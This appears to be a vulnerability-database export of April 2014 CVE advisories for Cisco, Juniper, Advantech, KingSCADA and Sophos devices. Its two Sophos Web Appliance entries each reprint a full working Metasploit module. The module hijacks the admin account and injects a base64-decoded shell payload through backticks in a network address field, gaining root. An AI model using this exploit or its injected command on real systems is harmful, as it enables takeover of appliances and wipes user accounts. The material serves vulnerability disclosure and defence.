VARIoT IoT vulnerabilities database
| VAR-201404-0571 | CVE-2014-2127 | Cisco Adaptive Security Appliance Vulnerability gained privilege in software |
CVSS V2: 8.5 CVSS V3: - Severity: HIGH |
Cisco Adaptive Security Appliance (ASA) Software 8.x before 8.2(5.48), 8.3 before 8.3(2.40), 8.4 before 8.4(7.9), 8.6 before 8.6(1.13), 9.0 before 9.0(4.1), and 9.1 before 9.1(4.3) does not properly process management-session information during privilege validation for SSL VPN portal connections, which allows remote authenticated users to gain privileges by establishing a Clientless SSL VPN session and entering crafted URLs, aka Bug ID CSCul70099. Cisco Adaptive Security Appliance is prone to a remote privilege-escalation vulnerability.
A remote attacker can exploit this issue to gain administrative access to affected devices.
This issue is tracked by Cisco Bug ID CSCul70099. The following versions are affected: Cisco ASA Software 8.0, 8.1, 8.2, 8.3 (2.40) before 8.3, 8.4, 8.6, 9.0, 9.1 before 9.1 (4.3)
| VAR-201404-0572 | CVE-2014-2128 | Cisco Adaptive Security Appliance Software SSL VPN Vulnerabilities that prevent authentication from being implemented |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The SSL VPN implementation in Cisco Adaptive Security Appliance (ASA) Software 8.2 before 8.2(5.47, 8.3 before 8.3(2.40), 8.4 before 8.4(7.3), 8.6 before 8.6(1.13), 9.0 before 9.0(3.8), and 9.1 before 9.1(3.2) allows remote attackers to bypass authentication via (1) a crafted cookie value within modified HTTP POST data or (2) a crafted URL, aka Bug ID CSCua85555.
Exploiting this issue could allow an attacker to bypass certain security restrictions and gain unauthenticated access to the SSL VPN Portal page.
This issue is tracked by Cisco Bug ID CSCua85555
| VAR-201404-0707 | No CVE | Yamaha RT-Series Routers Remote Denial of Service Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Yamaha RT-Series Routers is the RT series router products of Yamaha Group of Japan.
A remote denial of service vulnerability exists in Yamaha RT-Series Routers. An attacker could use this vulnerability to cause the affected application to crash and deny legitimate users
| VAR-201404-0573 | CVE-2014-2129 | Cisco Adaptive Security Appliance Software SIP Service disruption in inspection engines (DoS) Vulnerabilities |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
The SIP inspection engine in Cisco Adaptive Security Appliance (ASA) Software 8.2 before 8.2(5.48), 8.4 before 8.4(6.5), 9.0 before 9.0(3.1), and 9.1 before 9.1(2.5) allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted SIP packets, aka Bug ID CSCuh44052. Cisco ASA Software is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause an affected device to reload, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCuh44052
| VAR-201404-0649 | CVE-2014-2711 | Juniper Junos of J-Web Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in J-Web in Juniper Junos before 11.4R11, 11.4X27 before 11.4X27.62 (BBE), 12.1 before 12.1R9, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.2 before 12.2R7, 12.3 before 12.3R6, 13.1 before 13.1R4, 13.2 before 13.2R3, and 13.3 before 13.3R1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. Juniper Junos is prone to an HTML-injection vulnerability.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. Juniper Networks Junos is a set of network operating system of Juniper Networks (Juniper Networks) dedicated to the company's hardware system. The operating system provides a secure programming interface and Junos SDK. J-Web is a network management tool for routers or switches using Junos. The following releases are affected: Juniper Networks Junos Release 13.1 through 13.3, Release 12.1 through 12.3, 12.1x44, 12.1x45, 12.1x46, 11.4, 11.4x27
| VAR-201404-0634 | CVE-2014-2714 | Juniper SRX Used in series service gateways Juniper Junos Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.1 CVSS V3: - Severity: HIGH |
The Enhanced Web Filtering (EWF) in Juniper Junos before 10.4R15, 11.4 before 11.4R9, 12.1 before 12.1R7, 12.1X44 before 12.1X44-D20, 12.1X45 before 12.1X45-D10, and 12.1X46 before 12.1X46-D10, as used in the SRX Series services gateways, allows remote attackers to cause a denial of service (flow daemon crash and restart) via a crafted URL. Juniper Junos is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Juniper Networks Juniper Junos is a set of network operating system of Juniper Networks (Juniper Networks) dedicated to the company's hardware system. The operating system provides a secure programming interface and Junos SDK. The following versions are affected: Juniper Networks Junos 10.4, 11.4, 12.1x44, 12.1x45, 12.1x46, 12.1
| VAR-201404-0168 | CVE-2014-0612 | Juniper Junos Service disruption in (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Unspecified vulnerability in Juniper Junos before 11.4R10-S1, before 11.4R11, 12.1X44 before 12.1X44-D26, 12.1X44 before 12.1X44-D30, 12.1X45 before 12.1X45-D20, and 12.1X46 before 12.1X46-D10, when Dynamic IPsec VPN is configured, allows remote attackers to cause a denial of service (new Dynamic VPN connection failures and CPU and disk consumption) via unknown vectors. Juniper Junos is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Juniper Networks Juniper Junos is a set of network operating system of Juniper Networks (Juniper Networks) dedicated to the company's hardware system. The operating system provides a secure programming interface and Junos SDK. The following versions are affected: Juniper Networks Junos 12.1x45, 12.1x46, 12.1, 12.1x44, 11.4
| VAR-201404-0542 | CVE-2014-0767 | Advantech WebAccess AccessCode Parameter Handling Stack Buffer Overflow Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
An attacker may exploit this vulnerability by passing an overly long
value from the AccessCode argument to the control. This will overflow
the static stack buffer. The attacker may then execute code on the
target device remotely. Advantech WebAccess Contains a stack-based buffer overflow vulnerability.Too long by a third party AccessCode Arbitrary code may be executed via an argument. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. The control does not check the length of an attacker-supplied AccessCode string before copying it into a fixed length buffer on the stack. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess fails to properly filter user input when processing AccessCode parameters, allowing remote attackers to exploit vulnerabilities to submit special parameters that trigger stack buffer overflows, causing applications to crash or execute arbitrary code. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition.
Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
| VAR-201404-0547 | CVE-2014-0772 | Advantech WebAccess bwocxrun.ocx OpenUrlToBufferTimeout Method Arbitrary File Access Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The BWOCXRUN.BwocxrunCtrl.1 control contains a method named
OpenUrlToBufferTimeout. This method takes a URL as a parameter and
returns its contents to the caller in JavaScript. The URLs are accessed
in the security context of the current browser session. The control does
not perform any URL validation and allows file:// URLs that access the
local disk.
The method can be used to open a URL (including file URLs) and read
the URLs through JavaScript. This method could also be used to reach any
arbitrary URL to which the browser has access. This vulnerability allows remote attackers to access arbitrary files on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the bwocxrun.ocx cntrol. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
| VAR-201404-0543 | CVE-2014-0768 | Advantech WebAccess Vulnerable to stack-based buffer overflow |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
An attacker may pass an overly long value from the AccessCode2 argument
to the control to overflow the static stack buffer. The attacker may
then remotely execute arbitrary code. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. The control does not check the length of an attacker-supplied AccessCode2 string before copying it into a fixed length buffer on the stack. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess fails to properly filter user input when processing Username parameters, allowing remote attackers to exploit vulnerabilities to submit special parameters that trigger stack buffer overflows, allowing applications to crash or execute arbitrary code. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition.
Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions
| VAR-201404-0538 | CVE-2014-0763 | Advantech WebAccess of DBVisitor.dll In SQL Injection vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
An attacker using SQL injection may use arguments to construct queries
without proper sanitization. The DBVisitor.dll is exposed through SOAP
interfaces, and the exposed functions are vulnerable to SOAP injection.
This may allow unexpected SQL action and access to records in the table
of the software database or execution of arbitrary code. Advantech WebAccess of DBVisitor.dll Is SQL An injection vulnerability exists.Third party to unspecified functions SOAP Any via request SQL The command may be executed. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DBVisitor.dll component. These flaws allow an attacker to execute arbitrary SQL statements in the context of the web service and to exfiltrate data (including the account names and password hashes) from the vulnerable product. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. There is a SQL injection vulnerability in Advantech WebAccess. Because the SOAP interface exposes DBVisitor.dll, it allows an attacker to exploit a vulnerability to submit a specially crafted SOAP request, inject or manipulate a SQL query, and obtain sensitive sensitive information or manipulate the database. Advantech WebAccess is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, to access or modify data, or to exploit vulnerabilities in the underlying database.
Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
| VAR-201404-0539 | CVE-2014-0764 | Advantech WebAccess Vulnerable to stack-based buffer overflow |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
By providing an overly long string to the NodeName parameter, an
attacker may be able to overflow the static stack buffer. The attacker
may then execute code on the target device remotely. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess fails to properly filter user input when processing NodeName parameters, allowing remote attackers to exploit vulnerabilities to submit special parameters that trigger stack buffer overflows, allowing applications to crash or execute arbitrary code. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition.
Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions
| VAR-201404-0546 | CVE-2014-0771 | Advantech WebAccess bwocxrun.ocx Arbitrary File Access Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: HIGH |
The BWOCXRUN.BwocxrunCtrl.1 control contains a method named
“OpenUrlToBuffer.” This method takes a URL as a parameter and returns
its contents to the caller in JavaScript. The URLs are accessed in the
security context of the current browser session. The control does not
perform any URL validation and allows “file://” URLs that access the
local disk.
The method can be used to open a URL (including file URLs) and read
file URLs through JavaScript. This method could also be used to reach
any arbitrary URL to which the browser has access. This vulnerability allows remote attackers to access arbitrary files on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the bwocxrun.ocx cntrol. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
| VAR-201404-0541 | CVE-2014-0766 | Advantech WebAccess odeName2 Parameter Handling Stack Buffer Overflow Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
An attacker can exploit this vulnerability by copying an overly long
NodeName2 argument into a statically sized buffer on the stack to
overflow the static stack buffer. An attacker may use this vulnerability
to remotely execute arbitrary code. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. The control does not check the length of an attacker-supplied NodeName2 string before copying it into a fixed length buffer on the stack. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess fails to properly filter user input when processing odeName2 parameters, allowing remote attackers to exploit vulnerabilities to submit special parameters that trigger stack buffer overflows, causing applications to crash or execute arbitrary code. Failed attempts will likely cause a denial-of-service condition.
Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions
| VAR-201404-0438 | CVE-2014-2849 | Sophos Web Appliance of Change Password Vulnerability to change admin user password in dialog box |
CVSS V2: 8.5 CVSS V3: - Severity: HIGH |
The Change Password dialog box (change_password) in Sophos Web Appliance before 3.8.2 allows remote authenticated users to change the admin user password via a crafted request. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Sophos Web Appliance. Authentication is required to exploit this vulnerability.The specific flaws exist within the change_password and netinterface functions of the web appliance. The first flaw will allow for an unprivileged user to change the admin's password and a remote code execution vulnerability exists when updating the network interface. This allows for an attacker to execute under root privileges. Successfully exploiting these issues will result in the complete compromise of affected computers. The product supports real-time network threat protection, custom web filtering and dynamic control applications, etc. ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution',
'Description' => %q{
This module takes advantage of two vulnerabilities in order to gain remote code execution as root
as an otherwise non-privileged authorized user.
No server-side sanitization is done on values passed when configuring a static network interface.
This allows an administrator user to run arbitrary commands in the context of the web application,
which is root when configuring the network interface. This module will inadvertently delete
any other users that may have been present as a side effect of changing the admin's password.
},
'Author' =>
[
'Brandon Perry <bperry.volatile@gmail.com>' # discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-14-069/']
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' =>
{
'Space' => 500,
'DisableNops' => true,
'BadChars' => "", #base64 encryption ftw!
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet'
}
},
'Targets' =>
[
[ 'Sophos Web Protection Appliance 3.8.1.1', { }]
],
'DefaultOptions' =>
{
'SSL' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 8 2014'
))
register_options(
[
OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),
OptString.new('PASSWORD', [true, 'The password to authenticate with', nil]),
OptString.new('TARGETURI', [true, 'The target URI', '/']),
Opt::RPORT(443)
],
self.class
)
end
def exploit
init = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php')
})
if !init or !init.body
fail_with("Could not connect to host")
end
print_status("Getting STYLE key...")
style = ''
init.body.each_line do |line|
next if line !~ /name="STYLE" value="(.*)"/
style = $1
end
if style == ''
fail_with("Could not find style key.")
end
post = {
'STYLE' => style,
'destination' => '',
'section' => '',
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
print_status("Authenticating as " + datastore['USERNAME'])
login = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/index.php?c=login'),
'method' => 'POST',
'vars_post' => post
})
if !login or login.code != 200 or login.body !~ /#{datastore['USERNAME']}<\/a>/
fail_with("Authentication failed")
end
#I don't know what salt is being used to hash these
#passwords (probably in js somewhere), so I have
#to use a static one that I saw being POSTed while
#exploring, it is 'notpassword'.
#
#This will actually delete every other user that exists
#except for admin, whose password will be changed
#
#whoops
admin_hash = '[{"id": "default_admin", "username": "admin", "name": "Default Administrator"'
admin_hash << ', "password": "70ec23d3e019a307081732c0162b2733", "description": "Default '
admin_hash << 'Administrator Account", "admin": true, "roles": ["admin"], "reporting_groups"'
admin_hash << ': [], "user_id": 0}]'
post = {
'action' => 'save',
'STYLE' => style,
'username' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['USERNAME'])),
'current' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])),
'new' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])),
'admins' => admin_hash
}
print_status("Changing old password hash to notpassword")
passchange = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/index.php?c=change_password'),
'method' => 'POST',
'vars_post' => post
})
if !passchange or passchange.code != 200
fail_with("Couldn't update admin's password")
end
print_status("Logging in as the admin now")
init = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php')
})
if !init or init.code != 200
fail_with("Couldn't reget index page for admin auth")
end
init.body.each_line do |line|
next if line !~ /name="STYLE" value="(.*)"/
style = $1
end
post = {
'STYLE' => style,
'destination' => '',
'section' => '',
'username' => 'admin',
'password' => 'notpassword'
}
login = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php?c=login'),
'method' => 'POST',
'vars_post' => post
})
if !login or login.code != 200 or login.body !~ /admin<\/a>/
fail_with("Couldn't login as admin")
end
pay = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded))
post = {
'STYLE' => style,
'dhcp' => 'no',
'address' => "192.16`echo #{pay}|base64 --decode|sh`8.1.16",
'gateway' => '192.168.1.254',
'sb_bridge' => 'explicit',
'netmask' => '255.255.255.0',
'sb_linktype' => 'auto',
'dns' => 'yes',
'dns1' => '192.168.1.254',
'dns2' => '',
'dns3' => ''
}
print_status("Sending payload")
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php?c=netinterface'),
'method' => 'POST',
'vars_post' => post,
})
end
end
| VAR-201404-0545 | CVE-2014-0770 | Advantech WebAccess Vulnerable to stack-based buffer overflow |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
By providing an overly long string to the UserName parameter, an
attacker may be able to overflow the static stack buffer. The attacker
may then execute code on the target device remotely. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess fails to properly filter user input when processing NodeName parameters, allowing remote attackers to exploit vulnerabilities to submit special parameters that trigger stack buffer overflows, allowing applications to crash or execute arbitrary code. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition.
Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions
| VAR-201404-0552 | CVE-2014-0787 | WellinTech KingSCADA Stack Buffer Overflow Vulnerability |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Stack-based buffer overflow in WellinTech KingSCADA before 3.1.2.13 allows remote attackers to execute arbitrary code via a crafted packet. Authentication is not required to exploit this vulnerability.The specific flaw exists within the protocol parsing code contained in kxNetDispose.dll. The parent service is called AEserver.exe and listens on port 12401. The process performs arithmetic on an user-supplied value used to determine the size of a copy operation allowing a potential integer wrap to cause a stack buffer overflow. An unauthenticated attacker can leverage this vulnerability to execute code under the context of the SYSTEM user. The KingSCADA family of products is a Windows-based monitoring and data acquisition application. WellinTech KingSCADA is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Failed attacks will likely cause denial-of-service conditions.
KingSCADA versions prior to 3.1.2.13 is vulnerable
| VAR-201404-0540 | CVE-2014-0765 | Advantech WebAccess GotoCmd Parameter Handling Stack Buffer Overflow Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
To exploit this vulnerability, the attacker sends data from the GotoCmd
argument to control. If the value of the argument is overly long, the
static stack buffer can be overflowed. This will allow the attacker to
execute arbitrary code remotely. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the webvact.ocx ActiveX Control. The control does not check the length of an attacker-supplied GotoCmd string before copying it into a fixed length buffer on the stack. Advantech WebAccess HMI/SCADA is an HMI/SCADA software. Advantech WebAccess fails to properly filter user input when processing GotoCmd parameters, allowing remote attackers to exploit vulnerabilities to submit special parameters that trigger stack buffer overflows, allowing applications to crash or execute arbitrary code. Advantech WebAccess is prone to a stack-based buffer-overflow vulnerability because the application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Failed attempts will likely cause a denial-of-service condition.
Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment. There is a stack-based buffer overflow vulnerability in Advantech WebAccess 7.1 and earlier versions
| VAR-201404-0548 | CVE-2014-0773 | Advantech WebAccess bwocxrun.ocx CreateProcess Method Remote Command Execution Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
The BWOCXRUN.BwocxrunCtrl.1 control contains a method named
“CreateProcess.” This method contains validation to ensure an attacker
cannot run arbitrary command lines. After validation, the values
supplied in the HTML are passed to the Windows CreateProcessA API.
The validation can be bypassed allowing for running arbitrary command
lines. The command line can specify running remote files (example: UNC
command line).
A function exists at offset 100019B0 of bwocxrun.ocx. Inside this
function, there are 3 calls to strstr to check the contents of the user
specified command line. If “\setup.exe,” “\bwvbprt.exe,” or
“\bwvbprtl.exe” are contained in the command line (strstr returns
nonzero value), the command line passes validation and is then passed to
CreateProcessA. Advantech WebAccess of bwocxrun.ocx Inside BWOCXRUN.BwocxrunCtrl.1 ActiveX Control CreateProcess Method from any pathname (1) setup.exe , (2) bwvbprt.exe ,and (3) bwvbprtl.exe A vulnerability exists that allows program execution. Supplementary information : CWE Vulnerability type by CWE-77: Improper Neutralization of Special Elements used in a Command ( Command injection ) Has been identified. http://cwe.mitre.org/data/definitions/77.htmlFrom an arbitrary path name via a crafted argument by a third party (1) setup.exe , (2) bwvbprt.exe ,and (3) bwvbprtl.exe The program may be executed. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the bwocxrun.ocx. The control exposes a scriptable method 'CreateProcess'. Advantech WebAccess HMI/SCADA is an HMI/SCADA software.
Advantech WebAccess 7.1 and prior are vulnerable. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
| VAR-201404-0453 | CVE-2014-2850 | Sophos Web Appliance Arbitrary command execution vulnerability in the network interface settings page |
CVSS V2: 8.5 CVSS V3: - Severity: HIGH |
The network interface configuration page (netinterface) in Sophos Web Appliance before 3.8.2 allows remote administrators to execute arbitrary commands via shell metacharacters in the address parameter. Sophos Web Appliance is prone to a privilege-escalation vulnerability and remote code-execution vulnerability.
Attackers can leverage these issues to gain root privileges and execute arbitrary code. Successfully exploiting these issues will result in the complete compromise of affected computers.
Versions prior to Sophos Web Appliance 3.8.2 are vulnerable. The product supports real-time network threat protection, custom web filtering and dynamic control applications, etc. ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution',
'Description' => %q{
This module takes advantage of two vulnerabilities in order to gain remote code execution as root
as an otherwise non-privileged authorized user. By taking advantage of a mass assignment
vulnerability that allows an unprivileged authenticated user to change the admininistrator's
password hash, the module updates the password to login as the admin to reach the second vulnerability.
No server-side sanitization is done on values passed when configuring a static network interface. This module will inadvertently delete
any other users that may have been present as a side effect of changing the admin's password.
},
'Author' =>
[
'Brandon Perry <bperry.volatile@gmail.com>' # discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-14-069/']
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' =>
{
'Space' => 500,
'DisableNops' => true,
'BadChars' => "", #base64 encryption ftw!
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet'
}
},
'Targets' =>
[
[ 'Sophos Web Protection Appliance 3.8.1.1', { }]
],
'DefaultOptions' =>
{
'SSL' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 8 2014'
))
register_options(
[
OptString.new('USERNAME', [true, 'The username to authenticate as', nil]),
OptString.new('PASSWORD', [true, 'The password to authenticate with', nil]),
OptString.new('TARGETURI', [true, 'The target URI', '/']),
Opt::RPORT(443)
],
self.class
)
end
def exploit
init = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php')
})
if !init or !init.body
fail_with("Could not connect to host")
end
print_status("Getting STYLE key...")
style = ''
init.body.each_line do |line|
next if line !~ /name="STYLE" value="(.*)"/
style = $1
end
if style == ''
fail_with("Could not find style key.")
end
post = {
'STYLE' => style,
'destination' => '',
'section' => '',
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
print_status("Authenticating as " + datastore['USERNAME'])
login = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/index.php?c=login'),
'method' => 'POST',
'vars_post' => post
})
if !login or login.code != 200 or login.body !~ /#{datastore['USERNAME']}<\/a>/
fail_with("Authentication failed")
end
#I don't know what salt is being used to hash these
#passwords (probably in js somewhere), so I have
#to use a static one that I saw being POSTed while
#exploring, it is 'notpassword'.
#
#This will actually delete every other user that exists
#except for admin, whose password will be changed
#
#whoops
admin_hash = '[{"id": "default_admin", "username": "admin", "name": "Default Administrator"'
admin_hash << ', "password": "70ec23d3e019a307081732c0162b2733", "description": "Default '
admin_hash << 'Administrator Account", "admin": true, "roles": ["admin"], "reporting_groups"'
admin_hash << ': [], "user_id": 0}]'
post = {
'action' => 'save',
'STYLE' => style,
'username' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['USERNAME'])),
'current' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])),
'new' => Rex::Text.uri_encode(Rex::Text.encode_base64(datastore['PASSWORD'])),
'admins' => admin_hash
}
print_status("Changing old password hash to notpassword")
passchange = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/index.php?c=change_password'),
'method' => 'POST',
'vars_post' => post
})
if !passchange or passchange.code != 200
fail_with("Couldn't update admin's password")
end
print_status("Logging in as the admin now")
init = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php')
})
if !init or init.code != 200
fail_with("Couldn't reget index page for admin auth")
end
init.body.each_line do |line|
next if line !~ /name="STYLE" value="(.*)"/
style = $1
end
post = {
'STYLE' => style,
'destination' => '',
'section' => '',
'username' => 'admin',
'password' => 'notpassword'
}
login = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php?c=login'),
'method' => 'POST',
'vars_post' => post
})
if !login or login.code != 200 or login.body !~ /admin<\/a>/
fail_with("Couldn't login as admin")
end
pay = Rex::Text.uri_encode(Rex::Text.encode_base64(payload.encoded))
post = {
'STYLE' => style,
'dhcp' => 'no',
'address' => "192.16`echo #{pay}|base64 --decode|sh`8.1.16",
'gateway' => '192.168.1.254',
'sb_bridge' => 'explicit',
'netmask' => '255.255.255.0',
'sb_linktype' => 'auto',
'dns' => 'yes',
'dns1' => '192.168.1.254',
'dns2' => '',
'dns3' => ''
}
print_status("Sending payload")
send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php?c=netinterface'),
'method' => 'POST',
'vars_post' => post,
})
end
end